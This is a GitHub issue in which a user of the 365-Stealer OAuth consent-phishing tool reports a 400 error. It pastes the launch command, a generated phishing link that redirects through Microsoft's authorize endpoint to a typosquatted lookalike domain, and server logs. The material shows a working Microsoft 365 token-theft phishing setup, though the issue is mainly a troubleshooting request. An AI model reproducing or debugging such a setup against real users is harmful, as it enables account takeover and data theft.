Skip to content

Error 400 #9

New issue
New issue
Open
Open
Error 400#9
@frenyman

Description

@frenyman
frenyman
opened on Jul 9, 2024

Hi,
When the app is run and the phishing is sent locally, a 400 error appears and consent is accepted. The malicious app has the URI "https://login.microsofftonline.com:4443/login/authorized" and the DNS points to login.microsofftonline.com on localhost.

C:\xampp\htdocs\365-Stealer-master>python 365-Stealer.py --run-app --port 4443

      .oooo.       .ooo     oooooooo
    .dP""Y88b    .88'      dP"""""""
          ]8P'  d88'      d88888b.
        <88b.  d888P"Ybo.     `Y88b
         `88b. Y88[   ]88       ]88  8888888
    o.   .88P  `Y88   88P o.   .88P
    `8bd88P'    `88bod8'  `8bd88P'

     .oooooo..o     .                       oooo
    d8P'    `Y8   .o8                       `888
    Y88bo.      .o888oo  .ooooo.   .oooo.    888   .ooooo.  oooo d8b
     `"Y8888o.    888   d88' `88b `P  )88b   888  d88' `88b `888""8P
         `"Y88b   888   888ooo888  .oP"888   888  888ooo888  888
    oo     .d8P   888 . 888    .o d8(  888   888  888    .o  888
    8""88888P'    "888" `Y8bod8P' `Y888""8o o888o `Y8bod8P' d888b
________________________________________________________________________
 Credit: o365-Attack-Toolkit                 Author: @trouble1_raunak

 Github: https://github.com/alteredsecurity/365-Stealer


[!] Stealing processes delayed with 1 seconds.
Phishing Link => https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=xxxxxxx-xx-xxx-xxxx-398ed37e09e1&scope=https%3A%2F%2Fgraph.microsoft.com%2F.default+openid+offline_access+&redirect_uri=https%3A%2F%2Flogin.microsofftonline.com%3A4443%2Flogin%2Fauthorized&response_mode=query

Home page running on port: 4443

 * Serving Flask app '365-Stealer'
 * Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on https://127.0.0.1:4443
 * Running on https://192.168.56.73:4443
Press CTRL+C to quit
Error: 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /login/authorized HTTP/1.1" 302 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/css/bootstrap.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/css/style.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery/jquery.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/icofont/icofont.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/animate.css/animate.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/assets/owl.carousel.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/boxicons/css/boxicons.min.css HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery.easing/jquery.easing.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/php-email-form/validate.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/jquery-sticky/jquery.sticky.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/venobox/venobox.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/waypoints/jquery.waypoints.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/counterup/counterup.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/owl.carousel/owl.carousel.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/isotope-layout/isotope.pkgd.min.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/vendor/aos/aos.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/js/main.js HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/about.jpg HTTP/1.1" 304 -
127.0.0.1 - - [09/Jul/2024 07:33:06] "GET /static/assets/img/slide/slide-1.jpg HTTP/1.1" 304 -

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions